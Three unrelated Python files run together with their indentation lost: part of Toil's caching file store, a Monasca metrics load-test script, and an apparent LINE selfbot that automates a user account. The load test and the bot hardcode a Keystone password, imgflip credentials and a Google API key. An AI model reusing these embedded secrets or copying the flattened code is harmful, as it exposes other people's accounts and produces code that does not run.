# Then we let the job store export. TODO: let the export come from the
# cache? How would we write the URL?
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def waitForCommit(self):
# We need to block on the upload thread.
# We may be called even if startCommit is not called. In that
# case, a new instance of this class should have been created by the
# worker and ought to pick up all our work by PID via the database, and
# this instance doesn't actually have to commit.
if self.commitThread is not None:
self.commitThread.join()
return True
def startCommit(self, jobState=False):
# If we already started a commit (maybe with a different parameter
# value?) wait on it, so we can't forget to join it later.
self.waitForCommit()
# Start the commit thread
self.commitThread = threading.Thread(target=self.startCommitThread, args=(jobState,))
self.commitThread.start()
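# Typical usage, as a sketch: the worker calls startCommit() once the job body
# has finished, and later calls waitForCommit() to block until the background
# thread has pushed pending uploads and job state changes to the job store.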
def startCommitThread(self, jobState):
"""
Run in a thread to actually commit the current job.
"""
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
try:
# Reconnect to the database from this thread. The main thread can
# keep using self.con and self.cur. We need to do this because
# SQLite objects are tied to a thread.
con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
cur = con.cursor()
logger.debug('Committing file uploads asynchronously')
# Finish all uploads
self._executePendingUploads(con, cur)
# Finish all deletions out of the cache (not from the job store)
self._executePendingDeletions(self.workDir, con, cur)
if jobState:
# Do all the things that make this job not redoable
logger.debug('Committing file deletes and job state changes asynchronously')
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory for the node, which is used as the
cache directory and contains the cache state database. Job
local temp directories will be removed because they appear
in the database.
"""
if os.path.isdir(dir_):
# There is a directory to clean up
# We need the database for the most recent workflow attempt so we
# can clean up job temp directories.
# We don't have access to a class instance, nor do we have access
# to the workflow attempt number that we would need in order to
# find the right database by just going to it. We can't have a link
# to the current database because opening SQLite databases under
# multiple names breaks SQLite's atomicity guarantees (because you
# can't find the journal).
# So we just go and find the cache-n.db with the largest n value,
# and use that.
dbFilename = None
dbAttempt = float('-inf')
for dbCandidate in os.listdir(dir_):
# For each thing in the directory
match = re.match('cache-([0-9]+).db', dbCandidate)
if match and int(match.group(1)) > dbAttempt:
# If it looks like a caching database and it has a higher
# number than any other one we have seen, use it.
dbFilename = dbCandidate
dbAttempt = int(match.group(1))
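# For example, with cache-0.db, cache-2.db and cache-5.db present,
# cache-5.db (the most recent workflow attempt) is selected.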
if dbFilename is not None:
# We found a caching database
logger.debug('Connecting to latest caching database %s for cleanup', dbFilename)
dbPath = os.path.join(dir_, dbFilename)
if os.path.exists(dbPath):
try:
# The database exists, see if we can open it
con = sqlite3.connect(dbPath, timeout=SQLITE_TIMEOUT_SECS)
except:
# Probably someone deleted it.
pass
else:
# We got a database connection
# Create the tables if they don't exist so deletion of dead
# jobs won't fail.
cls._ensureTables(con)
# Remove dead jobs and their job directories (not under the
# cache)
cls._removeDeadJobs(dir_, con)
con.close()
else:
logger.debug('No caching database found in %s', dir_)
# Whether or not we found a database, we need to clean up the cache
# directory. Delete the state DB if any and everything cached.
robust_rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when the class instance is destroyed. Ensures
that all the file-writing threads exit.
"""
self.waitForCommit()
@classmethod
def _removeDeadJobs(cls, workDir, con):
"""
Look at the state of all jobs registered in the database, take over any
that belonged to dead workers, and clean their temp directories off the disk.
:param str workDir: Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
# Work out our process name for taking ownership of jobs
me = get_process_name(workDir)
# Get all the dead worker PIDs
workers = []
for row in cur.execute('SELECT DISTINCT worker FROM jobs WHERE worker IS NOT NULL'):
workers.append(row[0])
# Work out which of them are not currently running.
# TODO: account for PID reuse somehow.
deadWorkers = []
for worker in workers:
if not process_name_exists(workDir, worker):
deadWorkers.append(worker)
# Now we know which workers are dead.
# Clear them off of the jobs they had.
for deadWorker in deadWorkers:
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = NULL WHERE worker = ?', (deadWorker,))])
if len(deadWorkers) > 0:
logger.debug('Reaped %d dead workers', len(deadWorkers))
while True:
# Find an unowned job.
# Don't take all of them; other people could come along and want to help us with the other jobs.
cur.execute('SELECT id FROM jobs WHERE worker IS NULL LIMIT 1')
row = cur.fetchone()
if row is None:
# We cleaned up all the jobs
break
jobID = row[0]
# Try to own this job
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = ? WHERE id = ? AND worker IS NULL', (me, jobID))])
# See if we won the race
cur.execute('SELECT id, tempdir FROM jobs WHERE id = ? AND worker = ?', (jobID, me))
row = cur.fetchone()
if row is None:
# We didn't win the race. Try another one.
continue
# If we did win, delete the job and its files and temp dir
cls._removeJob(con, cur, jobID)
logger.debug('Cleaned up orphaned job %s', jobID)
# Now we have cleaned up all the jobs that belonged to dead workers that were dead when we entered this function.
|
perf-cs.py
|
"""num_threads simulates the number of clients
num_requests is the number of http requests per thread
num_metrics_per_request is the number of metrics per http request
Headers has the http header. You might want to set X-Auth-Token.
Urls can be an array of the Monasca API urls. There is only one url in
it right now, but you could add like the 3.
12/2014 Joe changes
- modified to create seperate python processes for each thread
1/2015 Allan changes
- modified for QA performance baseline testing
- all metric posts create a new time series based on a unique name
- the default numbers simulate 10K agent nodes posting 100 metrics/agent node
- added token retrieval from keystone, happens once for entire run
- added timestamp to output
- moved keystone to node 01 from 09
- made metric body more realistic, added dimensions, simplified name
6/2015 Allan changes
- modified for the CloudSystems env
- made dimensions as close to real CS metrics as possible
- by default, simulating 55K unique metrics to cover max CS load
- prior to running script, replace keystone password with password from hosts file on CS Monasca control node(s)
"""
import httplib
import multiprocessing
import sys
import time
import urlparse
from datetime import datetime
import simplejson
import hashlib
from xml.etree.ElementTree import XML
num_processes = 1
#num_requests = 1
#num_metrics_per_request = 1
num_requests = 220 # i - number of agents
num_metrics_per_request = 250 # x - number of metrics per agent
print "total: %s" % (num_processes*num_requests*num_metrics_per_request)
print('Time Stamp %s' % str(datetime.now()))
headers = {"Content-type": "application/json", "Accept": "application/json"}
urls = [
'http://192.168.0.5:8080/v2.0/metrics'
]
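# More endpoints can be listed to spread requests across API nodes; the extra
# addresses below are purely illustrative:
# urls = [
#     'http://192.168.0.5:8080/v2.0/metrics',
#     'http://192.168.0.6:8080/v2.0/metrics',
#     'http://192.168.0.7:8080/v2.0/metrics',
# ]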
keystone = 'http://192.168.0.20:5000/v3/auth/tokens'
def getToken():
keyurl = urlparse.urlparse(keystone)
keyconn = httplib.HTTPConnection(keyurl.netloc)
keybody = { "auth": {
"identity": {
"methods": ["password"],
"password": {
"user": {
"name": "monasca",
"domain": { "id": "default" },
"password": "538ac28040b1003fcaf259cb3c3fe51a2881a42b"
}
}
},
"scope": {
"project": {
"name": "demo",
"domain": { "id": "default" }
}
}
}
}
keybody = simplejson.dumps(keybody)
keyconn.request("POST", keyurl.path, keybody, headers)
res = keyconn.getresponse()
return res
def doWork(url_queue, num_requests,id):
url = url_queue.get()
for x in xrange(num_requests):
status, response = getStatus(url,id,x)
doSomethingWithResult(status, response)
def getStatus(ourl,id,x):
try:
url = urlparse.urlparse(ourl)
conn = httplib.HTTPConnection(url.netloc)
body = []
for i in xrange(num_metrics_per_request):
epoch = int(time.time()) - 120
body.append({"name": "cs.test_perf_" + str(x),
"dimensions": {"service": "monitoring", "hostname": "kvm" + str(i) + "-cn.veritas.local", "host_type": "compute_node", "role": "kvm", "device": "hw-" + str(i), "nova_id": str(i)},
"timestamp": epoch*1000,
"value": i})
body = simplejson.dumps(body)
conn.request("POST", url.path, body, tokenheaders)
res = conn.getresponse()
if res.status != 204:
raise Exception(res.status)
return res.status, ourl
except Exception as ex:
print ex
return "error", ourl
def doSomethingWithResult(status, url):
pass
q = multiprocessing.Queue()
for i in xrange(num_processes):
url = urls[i % len(urls)]
q.put(url.strip())
process_list = []
token = getToken().getheader('x-subject-token')
tokenheaders = {"Content-type": "application/json", "X-Auth-Token": token }
for i in range(num_processes):
p = multiprocessing.Process(target=doWork, args=(q, num_requests,i))
process_list.append(p)
p.start()
try:
for p in process_list:
try:
p.join()
except Exception:
pass
except KeyboardInterrupt:
sys.exit(1)
|
talk.py
|
# -*- coding: utf-8 -*-
from random import randint
from bs4 import BeautifulSoup
from wikiapi import WikiApi
from akad.ttypes import *
from kbbi import KBBI
from datetime import datetime, timedelta, date
from youtube_dl import YoutubeDL
from Aditya import Kaskus
from Aditya.AdityaMangakyo import *
import youtube_dl
from multiprocessing import Pool, Process
import time,random,sys,json,requests,os,subprocess,re,ast,traceback,humanize,threading,base64
from Aditya.AdityaSplitGood import AdityaSplitGood
from Aditya.memedit import *
import ntpath
def loggedIn(func):
def checkLogin(*args, **kwargs):
if args[0].isLogin:
return func(*args, **kwargs)
else:
args[0].callback.other('To call this function, you must be logged in to LINE')
return checkLogin
class Talk(object):
isLogin = False
_messageReq = {}
_unsendMessageReq = 0
kuciyose = {}
def __init__(self):
self.isLogin = True
"""User"""
def changecpvv(self,to,wait):
try:
path_vid = wait['talkban']['video']
files = {'file': open(path_vid, 'rb')}
obs_params = self.genOBSParams({'oid': self.profile.mid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
if wait['talkban']['pict'] == '':
return self.sendMessage(to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: Send the image....♪")
self.sendMessage(to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: Waiting....♪")
r_vp = self.server.postContent('{}/talk/vp/upload.nhn'.format(str(self.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:return "Failed"
path_pic = wait['talkban']['pict']
wait['talkban']['cvp'] = False
wait['talkban']['pict'] = ''
self.updateProfilePicture(path_pic, 'vp')
except Exception as e:
self.sendMessage(to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: ERROR 404 Plese Try again")
def fancyfancy(self,wait):
if wait['ChangeCover'] == True:
try:
if time.time() - wait['talkban']['time'] >= wait['talkban']['timer']:
a = random.randint(0,len(wait['timeline']))
self.updateProfileAttribute(2, wait['timeline'][a])
wait['talkban']['time'] = time.time()
wait['talkban']['timer'] = wait['talkban']['timer']
except:pass
def aditcontenttype(self,msg,wait,kuciyose):
if msg.contentType == 16:
if msg.to in wait["kitsuneshare"]:
zxc = " 「 POST NOTIFICATION 」\nCreate By: @!"
try:a = msg.contentMetadata["text"]
except:a = 'None'
zxc+= '\nText: '+a+'\nLink: '+msg.contentMetadata["postEndUrl"]
self.sendMention(msg.to,zxc,'',[msg.contentMetadata["postEndUrl"][25:58]])
if msg.contentType == 2:
if wait['talkban']['cvp'] == True:
try:
path = self.downloadObjectMsg(msg.id)
wait['talkban']['pict'] = ''
wait['talkban']['video'] = path
self.changecpvv(msg.to,wait)
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
if msg.contentType == 1:
if wait["ChangeDP"] == True:
try:
path = self.downloadFileURL('https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id, 'path')
self.updateProfilePicture(path)
self.sendMessage(msg.to, " 「 Profile 」\nType: Change Profile Picture\nStatus: Profile Picture Hasbeen change♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["ChangeDP"] = False
if wait['talkban']['cvp'] == True:
try:
path = self.downloadObjectMsg(msg.id)
wait['talkban']['pict'] = path
self.changecpvv(msg.to,wait)
self.sendMessage(msg.to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: Profile Video Picture Hasbeen change♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
if wait["GN"] == True:
try:
self.downloadObjectMsg(msg.id,'path','dataSeen/'+msg.to+'.png')
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["GN"] = False
if msg.to in wait["setTimess"]:
try:
path = self.downloadObjectMsg(msg.id,'path','dataSeen/adityab.png')
self.updateGroupPicture(msg.to,path)
self.sendMessage(msg.to, " 「 Group 」\nType: Change Cover Group\nStatus: Cover Group Hasbeen change♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["setTimess"].remove(msg.to)
if wait['ChangeGDP'] == True:
try:
a = self.downloadObjectMsg(msg.id,'path','s.png')
self.addImageToAlbum(msg.to, wait["Images"]['anu'], 's.png')
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["Img"] = {}
wait['ChangeGDP'] = False
if kuciyose['MakeWaterColor'] == True:
try:a = threading.Thread(target=self.imageGenerate, args=(msg,'http://ari-api.herokuapp.com/watercolor?type=2&rancol=on&url=',)).start();kuciyose['MakeWaterColor'] = False
except:self.sendMessage(msg.to,' 「 Water Color 」\nType: Image Generator\nStatus: Error Proses Image..♪\nImportant: Please Send the image again')
if kuciyose['DrawImage'] == True:
try:a = threading.Thread(target=self.imageGenerate, args=(msg,'http://ari-api.herokuapp.com/drawing?url=',)).start();kuciyose['DrawImage'] = False
except:self.sendMessage(msg.to,' 「 Water Color 」\nType: Image Generator\nStatus: Error Proses Image..♪\nImportant: Please Send the image again')
if kuciyose['MakeMeme'] == True:
try:
path = self.downloadFileURL('https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id, 'path','dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
make_meme(kuciyose['MakeMemeText1'], kuciyose['MakeMemeText2'], 'dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
self.sendImage(msg.to,'dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
os.remove('dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
kuciyose['MakeMeme'] = False
except:
self.sendMessage(msg.to,' 「 Meme 」\nType: Meme Generator\nStatus: Error Proses Image..♪\nImportant: Please Send the image again')
if wait["Addimage"] == True:
try:
url = 'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id
try:
if msg.contentMetadata != {}:
wait["Images"][wait["Img"]] = 'dataSeen/%s.gif' % wait["Img"];path = self.downloadObjectMsg(msg.id,'path','dataSeen/%s.gif' % wait["Img"],True)
except:wait["Images"][wait["Img"]] = 'dataSeen/%s.jpg' % wait["Img"];path = self.downloadFileURL(url, 'path','dataSeen/%s.jpg' % wait["Img"])
self.sendMessage(msg.to, " 「 Picture 」\nType: Add Picture\nStatus: Success Add Picture♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["Img"] = {}
wait["Addimage"] = False
if msg.contentType == 7:
a = self.shop.getProduct(packageID=int(msg.contentMetadata['STKPKGID']), language='ID', country='ID')
if wait["Addsticker"] == True:
wait["Sticker"][wait["Img"]] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["Img"] = {}
wait["Addsticker"] = False
if msg.to in wait["GROUP"]['AR']['S']:
if wait["GROUP"]['AR']['S'][msg.to]['AP'] == True:
wait["GROUP"]['AR']['S'][msg.to]['Sticker'] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Autorespon Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["GROUP"]['AR']['S'][msg.to]['AP'] = False
if msg.to in wait["GROUP"]['WM']['S']:
if wait["GROUP"]['WM']['S'][msg.to]['AP'] == True:
wait["GROUP"]['WM']['S'][msg.to]['Sticker'] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Welcome Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["GROUP"]['WM']['S'][msg.to]['AP'] = False
if msg.to in wait["GROUP"]['LM']['S']:
if wait["GROUP"]['LM']['S'][msg.to]['AP'] == True:
wait["GROUP"]['LM']['S'][msg.to]['Sticker'] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Leave Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["GROUP"]['LM']['S'][msg.to]['AP'] = False
if msg.contentType == 13:
self.adityeksekusidata(msg,wait)
if msg.to in wait["kitsunecontact"]:
s=msg.contentMetadata["mid"];a = self.getContact(s);zxc = " 「 Contact 」\nName: @!\n\nMid: "+s+"\n\nStatus Message:\n"+a.statusMessage
self.sendMention(msg.to, zxc,'', [s])
def set(self,msg,wait,kuciyose):
md = " 「 About 」\nSettings:"
if wait["setkey"] == '': md+="\n- Key: [Off]"
else: md+="\n- Key: "+wait["setkey"]
md+="\n\nGroup Settings:"
if msg.to in wait["GROUP"]['AM']['AP']:md+="\n- Auto Respon: [On]"
else:md+="\n- Auto Respon: [Off]"
if msg.to in wait["GROUP"]['WM']['AP']:md+="\n- Welcome MSG: [On]"
else:md+="\n- Welcome MSG: [Off]"
if msg.to in wait["GROUP"]['LM']['AP']:md+="\n- Leave MSG: [On]"
else:md+="\n- Leave MSG: [Off]"
try:
if wait['tos'][msg.to]['setset'] == True:md+="\n- Unsend Detect: [On]"
else:md+="\n- Unsend Detect: [Off]"
except:
wait['tos'][msg.to] = {'setset':False}
if wait['tos'][msg.to]['setset'] == True:md+="\n- Unsend Detect: [On]"
else:md+="\n- Unsend Detect: [Off]"
if msg.to in wait["setTimess"]:md+="\n- ChangeDP Group: [On]"
else:md+="\n- ChangeDP Group: [Off]"
md+="\n\nGenerator:"
if kuciyose['MakeMeme'] == True:md+="\n- Meme Generator: [On]"
else:md+="\n- Meme Generator: [Off]"
if kuciyose['MakeWaterColor'] == True:md+="\n- Image Watercolor: [On]"
else:md+="\n- Image Watercolor: [Off]"
if kuciyose['DrawImage'] == True:md+="\n- Image Drawing: [On]"
else:md+="\n- Image Drawing: [Off]"
self.sendMessage(msg.to,md)
def imageGenerate(self,msg,wait):
path = self.downloadFileURL('https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id, 'path','dataSeen/s.jpg')
r=requests.post(url="http://api.ntcorp.us/storage/make", data={'category':'kolorikolori',"submit": " "},files={'file': open(path,'rb')})
data = r.json()
self.sendImageWithURL(msg.to,'{}{}'.format(wait,self.ub64("http://api.ntcorp.us/storage/get/{}".format(data["result"]["id"]))))
def backupmyprofile(self,to,wait):
hh = self.profile.mid
self.updateProfileAttribute(2, wait['talkblacklist']['L'])
self.updateProfileAttribute(16, wait['talkblacklist']['U'])
path = self.downloadFileURL("http://dl.profile.line-cdn.net/"+wait['talkblacklist']['O'], 'path')
self.updateProfilePicture(path)
self.updateProfileCoverById(wait['talkblacklist']['S'])
self.sendMessage(to,"Sukses Backup\nDisplayName:" + wait['talkblacklist']['L'] + "\n「 Status 」\n" + wait['talkblacklist']['U'])
try:
self.sendImageWithURL(to,"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'Profile')
except Exception as e:
self.sendMessage(to," 「 Auto Respons 」\n"+str(e))
def setbackupprofile(self,to,wait):
hh = self.profile.mid
S = self.getProfileCoverId(hh)
L = self.getProfile().displayName;U = self.getProfile().statusMessage;O = self.getProfile().picturePath;self.sendMessage(to," 「 Backup Profil 」\nSukses Setdefault\nDisplayName:" + self.getProfile().displayName + "\n「Status 」\n" + self.getProfile().statusMessage + "\n「Picture 」")
wait['talkblacklist'] = {'L':L,'U':U,'O':O,'S':S}
me = self.getProfile()
self.sendImageWithURL(to,"http://dl.profile.line-cdn.net/" + me.picturePath,'Profile')
def waktu(self,secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
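# Example: waktu(90061) -> '01 Hari 01 Jam 01 Menit 01 Detik'
# (90061 seconds is 1 day, 1 hour, 1 minute and 1 second).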
def restart_program(self):
os.system('clear')
python = sys.executable
os.execl(python, python, * sys.argv)
"""Message"""
def sendMention(self,to, text="",ps='', mids=[]):
arrData = ""
arr = []
mention = "@ADIT GANTENG "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ''
h = ''
for mid in range(len(mids)):
h+= str(texts[mid].encode('unicode-escape'))
textx += str(texts[mid])
if h != textx:slen = len(textx)+h.count('U0');elen = len(textx)+h.count('U0') + 13
else:slen = len(textx);elen = len(textx) + 13
arrData = {'S':str(slen), 'E':str(elen), 'M':mids[mid]}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ''
slen = len(textx)
elen = len(textx) + 18
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
self.sendMessage(to, textx, {'AGENT_LINK': 'line://ti/p/~{}'.format(self.profile.userid),'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'AGENT_NAME': ps,'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
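# The MENTION metadata assembled above is, roughly, a JSON object of the form
# {"MENTIONEES": [{"S": "<start>", "E": "<end>", "M": "<mid>"}, ...]},
# where S and E are character offsets of the inserted "@..." placeholder in the
# final text and M is the mid of the mentioned user.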
def templatefoot(self,link,AI,AN):
a={'AGENT_LINK': link,
'AGENT_ICON': AI,
'AGENT_NAME': AN}
return a
def igsearch(self,msg,wait):
to = msg.to
msg.text = self.mycmd(msg.text,wait)
text = msg.text.split(' ')[1]
if len(msg.text.split(' ')) == 2:
try:
r = requests.get("http://rahandiapi.herokuapp.com/instainfo/"+msg.text.split(' ')[1]+"?key=betakey")
data = r.json()
a=" 「 Instagram 」\nType: Search User Instagram"
a+="\nName : "+str(data['result']['name'])
a+="\nBiography :\n "+str(data['result']['bio'])
a+="\nFollower : "+humanize.intcomma(data['result']['follower'])
a+="\nFollowing : "+humanize.intcomma(data['result']['following'])
a+="\nMedia : "+humanize.intcomma(data['result']['mediacount'])
a+="\nPrivate : "+str(data['result']['private'])
a+= "\nUsage:%s instagram %s num" %(wait["setkey"], str(text))
self.sendImageWithURL(to,data['result']['url'],str(data['result']['name']))
self.sendMessage(to,a, self.templatefoot('https://www.instagram.com/{}/'.format(data['result']['username']),'https://3xl39023n0uyvr5xx1gc1btk-wpengine.netdna-ssl.com/wp-content/uploads/2015/10/element-social-circle-instagram.png',str(data['result']['name'])))
except:
return self.sendMessage(to,"Status: 404\nReason: Instagram {} tidak ditemukan".format(text))
if len(msg.text.split(' ')) == 3:
try:
data1 = self.adityarequestweb('http://rahandiapi.herokuapp.com/instapost/{}/{}?key=betakey'.format(msg.text.split(' ')[1],msg.text.split(' ')[2]))
try:
if data1['media']['caption'] == '':a = ''
else:a = 'Caption: {}'.format(data1['media']['caption'])
a+="\nLikes : "+humanize.intcomma(data1['media']['like_count'])
try:
url = data1['media']['url']
if '.mp4' in url:
try:
self.sendVideoWithURL(to,url)
except:self.sendMessage(to,'Video Gagal Dimuat Silahkan Coba Kembali')
else:
self.sendImageWithURL(to,url,'Post IG')
except:
url = data1['media']['url']
if '.mp4' in url:
try:
self.sendVideoWithURL(to,url)
except:self.sendMessage(to,'Video Gagal Dimuat Silahkan Coba Kembali')
else:
b = []
for hgd in range(0,len(data1['media']['url'])):
self.sendImageWithURL(to,data1['media']['url'][hgd]['url'],'Post Ig')
self.sendMessage(to,a, self.templatefoot('https://www.instagram.com/{}/'.format(msg.text.split(' ')[1]),'https://3xl39023n0uyvr5xx1gc1btk-wpengine.netdna-ssl.com/wp-content/uploads/2015/10/element-social-circle-instagram.png',str(msg.text.split(' ')[1])))
except:
return self.sendMessage(to," 「 Instagram 」\nStatus: 404\nReason: Post or Username I'cant found")
except Exception as e:
ee = traceback.format_exc()
return self.sendMessage(to,'{}'.format(e))
def ub64(self,url):hasil = base64.b64encode(url.encode());return hasil.decode('utf-8')
def makewatercolor(self,msg,wait,kuciyose):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("watercolor "):
if msg.text.split(' ')[1] == 'on':kuciyose['MakeWaterColor'] = True;return self.sendMessage(msg.to,' 「 Water Color 」\nType: Image Generator\nStatus: Send the image....')
try:
if 'http://' in msg.text:
self.sendImageWithURL(msg.to,'http://ari-api.herokuapp.com/watercolor?type=2&rancol=on&url={}'.format(self.ub64(self.adityasplittext(msg.text.lower()))))
except Exception as e:
self.sendMessage(msg.to,str(e))
def makedrawingimage(self,msg,wait,kuciyose):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("drawimage "):
if msg.text.split(' ')[1] == 'on':kuciyose['DrawImage'] = True;return self.sendMessage(msg.to,' 「 Drawing 」\nType: Image Generator\nStatus: Send the image....')
try:
if 'http://' in msg.text:
self.sendImageWithURL(msg.to,'http://ari-api.herokuapp.com/drawing?url={}'.format(self.ub64(self.adityasplittext(msg.text.lower()))))
except Exception as e:
self.sendMessage(msg.to,str(e))
def makememe(self,msg,wait,kuciyose):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("meme "):
kitsunesplit = self.adityasplittext(msg.text.lower()).split("|")
if len(kitsunesplit) >= 2:
try:
try:
getTemplate=self.get_memes()[int(kitsunesplit[2])-1]['id']
genMeme=self.imgflipMeme(kitsunesplit[0],kitsunesplit[1],getTemplate,"impact")
except:
getTemplate=self.get_memes()[int(kitsunesplit[1])-1]['id']
genMeme=self.imgflipMeme(kitsunesplit[0],'',getTemplate,"impact")
self.sendImageWithURL(msg.to,genMeme['url'],'Meme Generator')
except:
kuciyose['MakeMeme'] = True;kuciyose['MakeMemeText1'] = kitsunesplit[0];kuciyose['MakeMemeText2'] = kitsunesplit[1]
self.sendMessage(msg.to,' 「 Meme 」\nType: Meme Generator\nStatus: Send the image....')
def imgflipMeme(self,upper_text,lower_text,template_id,font="impact"):
username = "kopisusu"
password = "kopisusu27"
text0 = upper_text
text1 = lower_text
url = "https://api.imgflip.com/caption_image"
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
payload = {'username':username, 'password':password, 'template_id':template_id, 'text0':text0, 'text1':text1, 'font':font}
req = requests.post(url, data=payload)
req.raise_for_status()
response = req.json()
if response['success']:
return response['data']
else:
raise RuntimeError("Imgflip returned error message: " + response['error_message'])
def memelist(self,msg,wait):
getTemplate=self.get_memes()
listtemp="List Template Meme:"
for i in range(0,100):
listtemp += "\n"+str(i+1) + ". " + getTemplate[i]['name']
listtemp += "\nType %smeme txt|text|num" %(wait["setkey"])
self.sendMessage(msg.to,listtemp)
def get_memes(self):
url = 'https://api.imgflip.com/get_memes'
r = requests.get(url)
r.raise_for_status()
response = r.json()
if response['success']:
return response['data']['memes']
else:
raise RuntimeError("Imgflip returned error message: " + response['error_message'])
def youtubelist(self,msg,wait):
kolor = msg.text
msg.text = self.mycmd(msg.text,wait)
cmk = msg.text.lower()
kitsunesplit = self.adityasplittext(msg.text.lower(),'s').split("|")
a = self.adityarequestweb("https://www.googleapis.com/youtube/v3/search?part=snippet&maxResults=25&q="+kitsunesplit[0]+"&type=video&key=AIzaSyAF-_5PLCt8DwhYc7LBskesUnsm1gFHSP8")
to = msg.to
kk = random.randint(0,999)
ditkey = ''
if msg.text.lower().startswith('youtube info '):
if(len(kitsunesplit) == 1 or len(kitsunesplit) == 2):self.sendMessage(to,' 「 Youtube 」\nWaiting....')
if(len(kitsunesplit) == 1):dfghj = self.adityasplittext(msg.text,'s');hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+self.adityasplittext(msg.text,'s'))
if(len(kitsunesplit) == 2):dfghj = 'https://www.youtube.com/watch?v='+a["items"][int(kitsunesplit[1])-1]["id"]['videoId'];hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfghj)
meta = hs['result']
if meta['description'] == '':hjk = ''
else:hjk = '\nDescription:\n{}'.format(meta['description'])
t = ' 「 Youtube 」\nTitle: {}{}\n\nLike: {} Dislike: {}\nViewers: {}'.format(meta['title'],hjk,humanize.intcomma(meta['likes']),humanize.intcomma(meta['dislikes']),humanize.intcomma(meta['viewcount']))
self.sendMessage(to,t, self.templatefoot(dfghj,'https://cdn3.iconfinder.com/data/icons/follow-me/256/YouTube-512.png',meta['title']))
self.sendImageWithURL(to,meta['thumbnail'],meta['title'])
if msg.text.lower().startswith('youtube download '):
if len(kitsunesplit) == 1:
with youtube_dl.YoutubeDL({}) as ydl:
dfg = self.adityasplittext(kolor,'s').replace('youtu.be/','youtube.com/watch?v=').replace('download ','')
meta = ydl.extract_info(dfg, download=False)
self.sendImageWithURL(to,meta['thumbnail'])
try:
data1 = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfg)
a= " 「 LINK DL 」\nType: Youtube Video\n"
a+= "\nTitle: " + str(data1["result"]['title'])
a+= "\nDuration: " + str(data1["result"]['duration'])
a+= "\nAuthor: "+str(data1["result"]['author'])
